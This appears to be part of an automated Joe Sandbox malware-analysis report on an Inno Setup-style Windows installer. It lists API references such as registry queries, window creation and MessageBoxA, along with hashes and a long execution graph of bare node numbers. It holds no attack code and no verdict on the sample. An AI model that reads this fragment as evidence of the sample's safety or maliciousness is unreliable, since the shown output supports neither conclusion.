                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: )q@
                                                                                                    • API String ID: 3660427363-2284170586
                                                                                                    • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                    • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                    • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                    • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                    Strings
                                                                                                    • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                    • Setup, xrefs: 00409CAD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                    • API String ID: 2030045667-3271211647
                                                                                                    • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                    • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                    • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                    • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 1458359878-0
                                                                                                    • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                    • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                    • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                    • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:16%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:4.7%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:83
LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50399->50421 50400->50387 50403 402648 18 API calls 50402->50403 50404 4069e7 50403->50404 50404->50387 50416 4769c5 50405->50416 50419 476a0e 50405->50419 50406 476a59 50422 451294 50406->50422 50408 476a70 50410 403420 4 API calls 50408->50410 50412 476a8a 50410->50412 50411 4038a4 18 API calls 50411->50419 50412->50387 50414 403450 18 API calls 50414->50416 50415 403450 18 API calls 50415->50419 50416->50414 50418 451294 35 API calls 50416->50418 50416->50419 50428 4038a4 50416->50428 50437 403744 50416->50437 50417 403744 18 API calls 50417->50419 50418->50416 50419->50406 50419->50411 50419->50415 50419->50417 50420 451294 35 API calls 50419->50420 50420->50419 50421->50400 50423 4512af 50422->50423 50427 4512a4 50422->50427 50441 451238 35 API calls 50423->50441 50425 4512ba 50425->50427 50442 408c0c 18 API calls 50425->50442 50427->50408 50430 4038b1 50428->50430 50436 4038e1 50428->50436 50429 403400 4 API calls 50432 4038cb 50429->50432 50431 4038da 50430->50431 50433 4038bd 50430->50433 50434 4034bc 18 API calls 50431->50434 50432->50416 50443 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50433->50443 50434->50436 50436->50429 50438 40374a 50437->50438 50440 40375b 50437->50440 50439 4034bc 18 API calls 50438->50439 50438->50440 50439->50440 50440->50416 50441->50425 50442->50427 50443->50432 50444 41ee54 50445 41ee63 IsWindowVisible 50444->50445 50446 41ee99 50444->50446 50445->50446 50447 41ee6d IsWindowEnabled 50445->50447 50447->50446 50448 41ee77 50447->50448 50449 402648 18 API calls 50448->50449 50450 41ee81 EnableWindow 50449->50450 50450->50446 50451 46bb10 50452 46bb44 50451->50452 50483 46bfad 50451->50483 50456 46bbdc 50452->50456 50457 46bbba 50452->50457 50458 46bbcb 50452->50458 50459 46bb98 50452->50459 50460 46bba9 50452->50460 50469 46bb80 50452->50469 50453 403400 4 API calls 50455 46bfec 50453->50455 50464 403400 4 API calls 50455->50464 50774 46baa0 59 API calls 50456->50774 50507 
46b6d0 50457->50507 50773 46b890 81 API calls 50458->50773 50771 46b420 61 API calls 50459->50771 50772 46b588 56 API calls 50460->50772 50468 46bff4 50464->50468 50467 46bb9e 50467->50469 50467->50483 50469->50483 50542 468c74 50469->50542 50470 46bc18 50470->50483 50486 46bc5b 50470->50486 50775 494da0 50470->50775 50473 46bd7e 50794 48358c 137 API calls 50473->50794 50474 414ae8 18 API calls 50474->50486 50477 46bd99 50477->50483 50478 42cbc0 20 API calls 50478->50486 50479 46af68 37 API calls 50479->50486 50481 403450 18 API calls 50481->50486 50483->50453 50484 46bdd7 50560 469f1c 50484->50560 50485 46af68 37 API calls 50485->50483 50486->50473 50486->50474 50486->50478 50486->50479 50486->50481 50486->50483 50486->50484 50503 46be9f 50486->50503 50545 468bb0 50486->50545 50553 46acd4 50486->50553 50698 483084 50486->50698 50811 46b1dc 33 API calls 50486->50811 50488 46be3d 50489 403450 18 API calls 50488->50489 50490 46be4d 50489->50490 50491 46bea9 50490->50491 50492 46be59 50490->50492 50497 46bf6b 50491->50497 50621 46af68 50491->50621 50795 457f1c 50492->50795 50496 457f1c 38 API calls 50496->50503 50503->50485 50812 46c424 50507->50812 50510 46b852 50512 403420 4 API calls 50510->50512 50514 46b86c 50512->50514 50513 46b71e 50515 46b83e 50513->50515 50819 455f84 27 API calls 50513->50819 50516 403400 4 API calls 50514->50516 50515->50510 50518 403450 18 API calls 50515->50518 50519 46b874 50516->50519 50518->50510 50520 403400 4 API calls 50519->50520 50521 46b87c 50520->50521 50521->50469 50522 46b801 50522->50510 50522->50515 50527 42cd48 21 API calls 50522->50527 50524 46b7a1 50524->50510 50524->50522 50829 42cd48 50524->50829 50526 46b73c 50526->50524 50820 466600 50526->50820 50529 46b817 50527->50529 50529->50515 50534 451458 18 API calls 50529->50534 50533 466600 33 API calls 50537 46b82e 50534->50537 50836 47efd0 56 API calls 50537->50836 50543 468bb0 33 API calls 50542->50543 50544 468c83 50543->50544 50544->50470 50546 468bdf 50545->50546 50547 
4078f4 33 API calls 50546->50547 50550 468c20 50546->50550 50548 468c18 50547->50548 51089 453344 18 API calls 50548->51089 50551 403400 4 API calls 50550->50551 50552 468c38 50551->50552 50552->50486 50554 46ace5 50553->50554 50555 46ace0 50553->50555 51175 469a80 60 API calls 50554->51175 50557 46ace3 50555->50557 51090 46a740 50555->51090 50557->50486 50558 46aced 50558->50486 50561 403400 4 API calls 50560->50561 50562 469f4a 50561->50562 51552 47dd00 50562->51552 50564 469fad 50565 469fb1 50564->50565 50566 469fca 50564->50566 51559 466800 50565->51559 50568 469fbb 50566->50568 51562 494c90 18 API calls 50566->51562 50570 46a25e 50568->50570 50573 46a154 50568->50573 50574 46a0e9 50568->50574 50571 403420 4 API calls 50570->50571 50576 46a288 50571->50576 50572 469fe6 50572->50568 50577 469fee 50572->50577 50575 403494 4 API calls 50573->50575 50578 403494 4 API calls 50574->50578 50580 46a161 50575->50580 50576->50488 50581 46af68 37 API calls 50577->50581 50579 46a0f6 50578->50579 50582 40357c 18 API calls 50579->50582 50583 40357c 18 API calls 50580->50583 50590 469ffb 50581->50590 50584 46a103 50582->50584 50585 46a16e 50583->50585 50586 40357c 18 API calls 50584->50586 50587 40357c 18 API calls 50585->50587 50588 46a110 50586->50588 50589 46a17b 50587->50589 50591 40357c 18 API calls 50588->50591 50592 40357c 18 API calls 50589->50592 50595 46a024 SetActiveWindow 50590->50595 50596 46a03c 50590->50596 50593 46a11d 50591->50593 50594 46a188 50592->50594 50597 466800 34 API calls 50593->50597 50598 40357c 18 API calls 50594->50598 50595->50596 51563 42f560 50596->51563 50599 46a12b 50597->50599 50600 46a196 50598->50600 50602 40357c 18 API calls 50599->50602 50603 414b18 18 API calls 50600->50603 50605 46a134 50602->50605 50606 46a152 50603->50606 50608 40357c 18 API calls 50605->50608 51580 466b38 50606->51580 50611 46a141 50608->50611 50610 46a08d 50613 46ade4 35 API calls 50610->50613 50612 414b18 18 API calls 50611->50612 50612->50606 50614 46a0bf 
50613->50614 50614->50488 50622 468c74 33 API calls 50621->50622 50623 46af80 50622->50623 50624 46afa2 50623->50624 50625 4652cc 21 API calls 50623->50625 51765 4652cc 50624->51765 50625->50624 50629 46afba 50630 46ade4 35 API calls 50629->50630 50631 46aff2 50630->50631 50632 414b18 18 API calls 50631->50632 50633 46b006 50632->50633 50634 46b012 50633->50634 50635 46b03c 50633->50635 50636 414b18 18 API calls 50634->50636 50638 46b05b 50635->50638 50639 46b085 50635->50639 50637 46b026 50636->50637 50640 414b18 18 API calls 50637->50640 50641 414b18 18 API calls 50638->50641 50642 414b18 18 API calls 50639->50642 50644 46b03a 50640->50644 50645 46b06f 50641->50645 50643 46b099 50642->50643 50646 414b18 18 API calls 50643->50646 50647 414b18 18 API calls 50645->50647 50646->50644 50647->50644 50699 46c424 62 API calls 50698->50699 50700 4830c7 50699->50700 50701 4830d0 50700->50701 52041 408be0 19 API calls 50700->52041 50703 414ae8 18 API calls 50701->50703 50704 4830e0 50703->50704 50705 403450 18 API calls 50704->50705 50706 4830ed 50705->50706 51843 46c77c 50706->51843 50709 4830fd 50711 414ae8 18 API calls 50709->50711 50712 48310d 50711->50712 50713 403450 18 API calls 50712->50713 50714 48311a 50713->50714 50715 469868 SendMessageA 50714->50715 50716 483133 50715->50716 50717 483184 50716->50717 52043 479e18 37 API calls 50716->52043 51872 4241dc IsIconic 50717->51872 50721 48319f SetActiveWindow 50722 4831b4 50721->50722 51880 4824b4 50722->51880 50771->50467 50772->50469 50773->50469 50774->50469 53704 43d9c8 50775->53704 50778 494dcc 53709 431bd0 50778->53709 50779 494e52 50780 494e61 50779->50780 53742 4945c8 18 API calls 50779->53742 50780->50486 50789 494e16 53740 49465c 18 API calls 50789->53740 50791 494e2a 53741 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50791->53741 50793 494e4a 50793->50486 50794->50477 50796 457f41 50795->50796 50797 457f61 50796->50797 50798 4078f4 33 API calls 50796->50798 50799 403400 4 API calls 50797->50799 
50800 457f59 50798->50800 50801 457f76 50799->50801 50802 457d10 38 API calls 50800->50802 50801->50496 50802->50797 50811->50486 50837 46c4bc 50812->50837 50815 414ae8 50816 414af6 50815->50816 50817 4034e0 18 API calls 50816->50817 50818 414b03 50817->50818 50818->50513 50819->50526 50821 46661a 50820->50821 51040 4078f4 50821->51040 51083 42cccc 50829->51083 50832 451458 50833 451428 18 API calls 50832->50833 50834 451474 50833->50834 50835 47efd0 56 API calls 50834->50835 50835->50522 50836->50515 50838 414ae8 18 API calls 50837->50838 50839 46c4f0 50838->50839 50898 466898 50839->50898 50843 46c502 50844 46c511 50843->50844 50847 46c52a 50843->50847 50967 47efd0 56 API calls 50844->50967 50846 403420 4 API calls 50849 46b702 50846->50849 50848 46c571 50847->50848 50850 46c558 50847->50850 50851 46c5d6 50848->50851 50856 46c575 50848->50856 50849->50510 50849->50815 50968 47efd0 56 API calls 50850->50968 50970 42cb4c CharNextA 50851->50970 50854 46c5e5 50855 46c5e9 50854->50855 50860 46c602 50854->50860 50971 47efd0 56 API calls 50855->50971 50858 46c5bd 50856->50858 50856->50860 50969 47efd0 56 API calls 50858->50969 50859 46c626 50972 47efd0 56 API calls 50859->50972 50860->50859 50912 466a08 50860->50912 50865 46c525 50865->50846 50868 46c63f 50920 403778 50868->50920 50873 46c666 50973 466a94 18 API calls 50873->50973 50874 46c697 50931 42c8cc 50874->50931 50877 46c679 50879 451458 18 API calls 50877->50879 50881 46c686 50879->50881 50974 47efd0 56 API calls 50881->50974 50903 4668b2 50898->50903 50899 406bb0 18 API calls 50899->50903 50901 42cbc0 20 API calls 50901->50903 50902 403450 18 API calls 50902->50903 50903->50899 50903->50901 50903->50902 50904 4668fb 50903->50904 50977 42caac 50903->50977 50905 403420 4 API calls 50904->50905 50906 466915 50905->50906 50907 414b18 50906->50907 50908 414ae8 18 API calls 50907->50908 50909 414b3c 50908->50909 50910 403400 4 API calls 50909->50910 50911 414b6d 50910->50911 50911->50843 50913 466a12 50912->50913 
50914 466a25 50913->50914 50993 42cb3c CharNextA 50913->50993 50914->50859 50916 466a38 50914->50916 50917 466a42 50916->50917 50918 466a6f 50917->50918 50994 42cb3c CharNextA 50917->50994 50918->50859 50918->50868 50921 4037aa 50920->50921 50922 40377d 50920->50922 50923 403400 4 API calls 50921->50923 50922->50921 50924 403791 50922->50924 50926 4037a0 50923->50926 50925 4034e0 18 API calls 50924->50925 50925->50926 50927 42c99c 50926->50927 50928 42c9b2 50927->50928 50929 42c9f5 50927->50929 50928->50929 50995 42cb3c CharNextA 50928->50995 50929->50873 50929->50874 50996 42c674 50931->50996 50967->50865 50968->50865 50969->50865 50970->50854 50971->50865 50972->50865 50973->50877 50974->50865 50978 403494 4 API calls 50977->50978 50979 42cabc 50978->50979 50980 403744 18 API calls 50979->50980 50984 42caf2 50979->50984 50986 42c444 IsDBCSLeadByte 50979->50986 50980->50979 50982 42cb36 50982->50903 50984->50982 50987 4037b8 50984->50987 50992 42c444 IsDBCSLeadByte 50984->50992 50986->50979 50988 403744 18 API calls 50987->50988 50990 4037c6 50988->50990 50989 4037fc 50989->50984 50990->50989 50991 4038a4 18 API calls 50990->50991 50991->50989 50992->50984 50993->50913 50994->50917 50995->50928 50999 42c67c 50996->50999 51002 42c68d 50999->51002 51000 42c6f1 51003 42c6ec 51000->51003 51007 42c444 IsDBCSLeadByte 51000->51007 51002->51000 51005 42c6ab 51002->51005 51005->51003 51006 42c444 IsDBCSLeadByte 51005->51006 51006->51005 51007->51003 51043 407908 51040->51043 51044 407925 51043->51044 51051 4075b8 51044->51051 51047 407951 51049 4034e0 18 API calls 51047->51049 51050 407903 51049->51050 51050->50533 51054 4075d3 51051->51054 51052 4075e5 51052->51047 51056 4069a0 19 API calls 51052->51056 51054->51052 51057 4076da 33 API calls 51054->51057 51058 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51054->51058 51056->51047 51057->51054 51058->51054 51084 42cbc0 20 API calls 51083->51084 51085 42ccee 51084->51085 51086 42ccf6 GetFileAttributesA 51085->51086 
51087 403400 4 API calls 51086->51087 51088 42cd13 51087->51088 51088->50522 51088->50832 51089->50550 51092 46a787 51090->51092 51091 46abff 51094 46ac1a 51091->51094 51095 46ac4b 51091->51095 51092->51091 51093 46a842 51092->51093 51096 403494 4 API calls 51092->51096 51099 46a863 51093->51099 51100 46a8a4 51093->51100 51097 403494 4 API calls 51094->51097 51098 403494 4 API calls 51095->51098 51102 46a7c6 51096->51102 51103 46ac28 51097->51103 51104 46ac59 51098->51104 51101 403494 4 API calls 51099->51101 51108 403400 4 API calls 51100->51108 51105 46a871 51101->51105 51106 414ae8 18 API calls 51102->51106 51202 46915c 26 API calls 51103->51202 51203 46915c 26 API calls 51104->51203 51110 414ae8 18 API calls 51105->51110 51111 46a7e7 51106->51111 51112 46a8a2 51108->51112 51114 46a892 51110->51114 51176 403634 51111->51176 51132 46a988 51112->51132 51182 469868 51112->51182 51113 46ac36 51116 403400 4 API calls 51113->51116 51117 403634 18 API calls 51114->51117 51120 46ac7c 51116->51120 51117->51112 51125 403400 4 API calls 51120->51125 51121 46aa10 51123 403400 4 API calls 51121->51123 51128 46aa0e 51123->51128 51124 46a8c4 51129 46a902 51124->51129 51130 46a8ca 51124->51130 51126 46ac84 51125->51126 51131 403420 4 API calls 51126->51131 51197 469ca4 57 API calls 51128->51197 51133 403400 4 API calls 51129->51133 51134 403494 4 API calls 51130->51134 51136 46ac91 51131->51136 51132->51121 51137 46a9cf 51132->51137 51138 46a900 51133->51138 51135 46a8d8 51134->51135 51188 47c26c 51135->51188 51136->50557 51142 403494 4 API calls 51137->51142 51191 469b5c 51138->51191 51146 46a9dd 51142->51146 51144 46aa39 51152 46aa44 51144->51152 51153 46aa9a 51144->51153 51145 46a8f0 51148 403634 18 API calls 51145->51148 51149 414ae8 18 API calls 51146->51149 51148->51138 51151 46a9fe 51149->51151 51154 403634 18 API calls 51151->51154 51156 403494 4 API calls 51152->51156 51155 403400 4 API calls 51153->51155 51154->51128 51162 46aaa2 51155->51162 51164 46aa52 51156->51164 
51157 46a929 51158 46a934 51157->51158 51159 46a98a 51157->51159 51161 403494 4 API calls 51158->51161 51160 403400 4 API calls 51159->51160 51160->51132 51166 46a942 51161->51166 51174 46ab4b 51162->51174 51198 494c90 18 API calls 51162->51198 51164->51162 51168 403634 18 API calls 51164->51168 51170 46aa98 51164->51170 51165 46aac5 51165->51174 51199 494f3c 32 API calls 51165->51199 51166->51132 51169 403634 18 API calls 51166->51169 51168->51164 51169->51166 51170->51162 51172 46abec 51201 429144 SendMessageA SendMessageA 51172->51201 51200 4290f4 SendMessageA 51174->51200 51175->50558 51177 40363c 51176->51177 51178 4034bc 18 API calls 51177->51178 51179 40364f 51178->51179 51180 403450 18 API calls 51179->51180 51181 403677 51180->51181 51204 42a040 SendMessageA 51182->51204 51184 469877 51185 469897 51184->51185 51205 42a040 SendMessageA 51184->51205 51185->51124 51187 469887 51187->51124 51206 47c2b4 51188->51206 51195 469b89 51191->51195 51192 469beb 51193 403400 4 API calls 51192->51193 51194 469c00 51193->51194 51194->51157 51195->51192 51551 469ae0 57 API calls 51195->51551 51197->51144 51198->51165 51199->51174 51200->51172 51201->51091 51202->51113 51203->51113 51204->51184 51205->51187 51207 403494 4 API calls 51206->51207 51214 47c2e7 51207->51214 51208 47c3f9 51209 403420 4 API calls 51208->51209 51210 47c289 51209->51210 51210->51145 51212 403778 18 API calls 51212->51214 51214->51208 51214->51212 51217 4037b8 18 API calls 51214->51217 51218 47b100 51214->51218 51462 453344 18 API calls 51214->51462 51463 403800 51214->51463 51467 42c97c CharPrevA 51214->51467 51217->51214 51219 47b152 51218->51219 51220 47b130 51218->51220 51221 47b172 51219->51221 51222 47b160 51219->51222 51220->51219 51472 47a030 33 API calls 51220->51472 51225 47b1d5 51221->51225 51226 47b180 51221->51226 51223 403494 4 API calls 51222->51223 51277 47b16d 51223->51277 51235 47b1f6 51225->51235 51236 47b1e3 51225->51236 51228 47b1af 51226->51228 51229 47b189 51226->51229 51227 
403400 4 API calls 51230 47baf8 51227->51230 51232 47b1c2 51228->51232 51474 453344 18 API calls 51228->51474 51231 47b19c 51229->51231 51473 453344 18 API calls 51229->51473 51234 403400 4 API calls 51230->51234 51238 403494 4 API calls 51231->51238 51233 403494 4 API calls 51232->51233 51233->51277 51240 47bb00 51234->51240 51242 47b217 51235->51242 51243 47b204 51235->51243 51241 403494 4 API calls 51236->51241 51238->51277 51240->51214 51241->51277 51245 47b267 51242->51245 51246 47b225 51242->51246 51244 403494 4 API calls 51243->51244 51244->51277 51253 47b275 51245->51253 51254 47b288 51245->51254 51247 47b241 51246->51247 51248 47b22e 51246->51248 51250 47b254 51247->51250 51475 453344 18 API calls 51247->51475 51249 403494 4 API calls 51248->51249 51249->51277 51252 403494 4 API calls 51250->51252 51252->51277 51255 403494 4 API calls 51253->51255 51256 47b296 51254->51256 51257 47b2a9 51254->51257 51255->51277 51258 403494 4 API calls 51256->51258 51259 47b2b7 51257->51259 51260 47b2ca 51257->51260 51258->51277 51261 403494 4 API calls 51259->51261 51262 47b2eb 51260->51262 51263 47b2d8 51260->51263 51261->51277 51265 47b327 51262->51265 51266 47b2f9 51262->51266 51264 403494 4 API calls 51263->51264 51264->51277 51271 47b335 51265->51271 51276 47b364 51265->51276 51267 47b315 51266->51267 51268 47b302 51266->51268 51270 47c26c 57 API calls 51267->51270 51269 403494 4 API calls 51268->51269 51269->51277 51270->51277 51272 47b351 51271->51272 51273 47b33e 51271->51273 51275 403494 4 API calls 51272->51275 51274 403494 4 API calls 51273->51274 51274->51277 51275->51277 51278 47b372 51276->51278 51279 47b3a0 51276->51279 51277->51227 51280 47b38e 51278->51280 51281 47b37b 51278->51281 51284 47b3ae 51279->51284 51285 47b3dd 51279->51285 51462->51214 51464 40382f 51463->51464 51465 403804 51463->51465 51464->51214 51466 4038a4 18 API calls 51465->51466 51466->51464 51467->51214 51472->51220 51473->51231 51474->51232 51475->51250 51551->51195 51553 47dd56 
51552->51553 51554 47dd19 51552->51554 51553->50564 51584 455d0c 51554->51584 51558 47dd6d 51558->50564 51703 466714 51559->51703 51562->50572 51564 42f56c 51563->51564 51565 42f58f GetActiveWindow GetFocus 51564->51565 51566 41eea4 2 API calls 51565->51566 51567 42f5a6 51566->51567 51568 42f5c3 51567->51568 51569 42f5b3 RegisterClassA 51567->51569 51570 42f652 SetFocus 51568->51570 51571 42f5d1 CreateWindowExA 51568->51571 51569->51568 51572 403400 4 API calls 51570->51572 51571->51570 51573 42f604 51571->51573 51574 42f66e 51572->51574 51734 42427c 51573->51734 51579 494f3c 32 API calls 51574->51579 51576 42f62c 51577 42f634 CreateWindowExA 51576->51577 51577->51570 51578 42f64a ShowWindow 51577->51578 51578->51570 51579->50610 51740 44b514 51580->51740 51585 455d1d 51584->51585 51586 455d21 51585->51586 51587 455d2a 51585->51587 51610 455a10 51586->51610 51618 455af0 43 API calls 51587->51618 51590 455d27 51590->51553 51591 47d970 51590->51591 51596 47da6c 51591->51596 51598 47d9b0 51591->51598 51592 403420 4 API calls 51593 47db4f 51592->51593 51593->51558 51603 47dabd 51596->51603 51606 47da0f 51596->51606 51673 479630 51596->51673 51598->51596 51599 47da18 51598->51599 51602 47c26c 57 API calls 51598->51602 51598->51606 51647 479770 51598->51647 51658 4798d4 51598->51658 51599->51598 51604 47c26c 57 API calls 51599->51604 51609 47da59 51599->51609 51662 42c92c 51599->51662 51667 42c954 51599->51667 51672 47d67c 66 API calls 51599->51672 51600 47c26c 57 API calls 51600->51603 51601 454100 34 API calls 51601->51603 51602->51598 51603->51596 51603->51600 51603->51601 51603->51609 51604->51599 51606->51592 51609->51606 51619 42de1c 51610->51619 51612 455a2d 51613 455a7b 51612->51613 51622 455944 51612->51622 51613->51590 51616 455944 20 API calls 51617 455a5c RegCloseKey 51616->51617 51617->51590 51618->51590 51620 42de27 51619->51620 51621 42de2d RegOpenKeyExA 51619->51621 51620->51621 51621->51612 51627 42dd58 51622->51627 51624 403420 4 API calls 51625 4559f6 
51624->51625 51625->51616 51626 45596c 51626->51624 51630 42dc00 51627->51630 51631 42dc26 RegQueryValueExA 51630->51631 51636 42dc49 51631->51636 51646 42dc6b 51631->51646 51632 403400 4 API calls 51634 42dd37 51632->51634 51633 42dc63 51635 403400 4 API calls 51633->51635 51634->51626 51635->51646 51636->51633 51637 4034e0 18 API calls 51636->51637 51638 403744 18 API calls 51636->51638 51636->51646 51637->51636 51639 42dca0 RegQueryValueExA 51638->51639 51639->51631 51640 42dcbc 51639->51640 51641 4038a4 18 API calls 51640->51641 51640->51646 51642 42dcfe 51641->51642 51643 42dd10 51642->51643 51645 403744 18 API calls 51642->51645 51644 403450 18 API calls 51643->51644 51644->51646 51645->51643 51646->51632 51648 479786 51647->51648 51649 479782 51647->51649 51650 403450 18 API calls 51648->51650 51649->51598 51651 479793 51650->51651 51652 4797b3 51651->51652 51653 479799 51651->51653 51655 479630 33 API calls 51652->51655 51654 479630 33 API calls 51653->51654 51656 4797af 51654->51656 51655->51656 51657 403400 4 API calls 51656->51657 51657->51649 51659 4798e0 51658->51659 51660 4798fb 51659->51660 51685 453344 18 API calls 51659->51685 51660->51598 51686 42c79c 51662->51686 51665 403778 18 API calls 51666 42c94e 51665->51666 51666->51599 51668 42c79c IsDBCSLeadByte 51667->51668 51669 42c964 51668->51669 51670 403778 18 API calls 51669->51670 51671 42c975 51670->51671 51671->51599 51672->51599 51674 47964b 51673->51674 51677 47967c 51674->51677 51684 47970a 51674->51684 51698 4794e4 33 API calls 51674->51698 51675 4796a1 51680 4796c2 51675->51680 51700 4794e4 33 API calls 51675->51700 51677->51675 51699 4794e4 33 API calls 51677->51699 51681 479702 51680->51681 51680->51684 51701 453344 18 API calls 51680->51701 51692 479368 51681->51692 51684->51596 51685->51660 51687 42c67c IsDBCSLeadByte 51686->51687 51689 42c7b1 51687->51689 51688 42c7fb 51688->51665 51689->51688 51691 42c444 IsDBCSLeadByte 51689->51691 51691->51689 51693 4793a3 51692->51693 51694 403450 
18 API calls 51693->51694 51695 4793c8 51694->51695 51702 477a58 33 API calls 51695->51702 51697 479409 51697->51684 51698->51677 51699->51675 51700->51680 51701->51681 51702->51697 51704 403494 4 API calls 51703->51704 51705 466742 51704->51705 51720 42dbc8 51705->51720 51708 42dbc8 19 API calls 51709 466766 51708->51709 51710 466600 33 API calls 51709->51710 51711 466770 51710->51711 51712 42dbc8 19 API calls 51711->51712 51713 46677f 51712->51713 51723 466678 51713->51723 51716 42dbc8 19 API calls 51717 466798 51716->51717 51718 403400 4 API calls 51717->51718 51719 4667ad 51718->51719 51719->50568 51727 42db10 51720->51727 51724 466698 51723->51724 51725 4078f4 33 API calls 51724->51725 51726 4666e2 51725->51726 51726->51716 51728 42db30 51727->51728 51729 42dbbb 51727->51729 51728->51729 51730 4037b8 18 API calls 51728->51730 51732 403800 18 API calls 51728->51732 51733 42c444 IsDBCSLeadByte 51728->51733 51729->51708 51730->51728 51732->51728 51733->51728 51735 4242ae 51734->51735 51736 42428e GetWindowTextA 51734->51736 51738 403494 4 API calls 51735->51738 51737 4034e0 18 API calls 51736->51737 51739 4242ac 51737->51739 51738->51739 51739->51576 51743 44b38c 51740->51743 51744 44b3bf 51743->51744 51745 414ae8 18 API calls 51744->51745 51746 44b3d2 51745->51746 51747 44b3ff GetDC 51746->51747 51748 40357c 18 API calls 51746->51748 51749 41a1e8 19 API calls 51747->51749 51748->51747 51750 44b41f SelectObject 51749->51750 51751 44b430 51750->51751 51754 44b0c0 51751->51754 51755 44b0d7 51754->51755 51756 44b16a 51755->51756 51757 44b153 51755->51757 51758 44b0ea 51755->51758 51758->51756 51768 4652d7 51765->51768 51766 4653b2 51776 46708c 51766->51776 51767 46536a 51767->51766 51794 4185b8 21 API calls 51767->51794 51768->51766 51771 465327 51768->51771 51788 421a1c 51768->51788 51771->51767 51772 465361 51771->51772 51773 46536c 51771->51773 51774 421a1c 21 API calls 51772->51774 51775 421a1c 21 API calls 51773->51775 51774->51767 51775->51767 51777 4670bc 
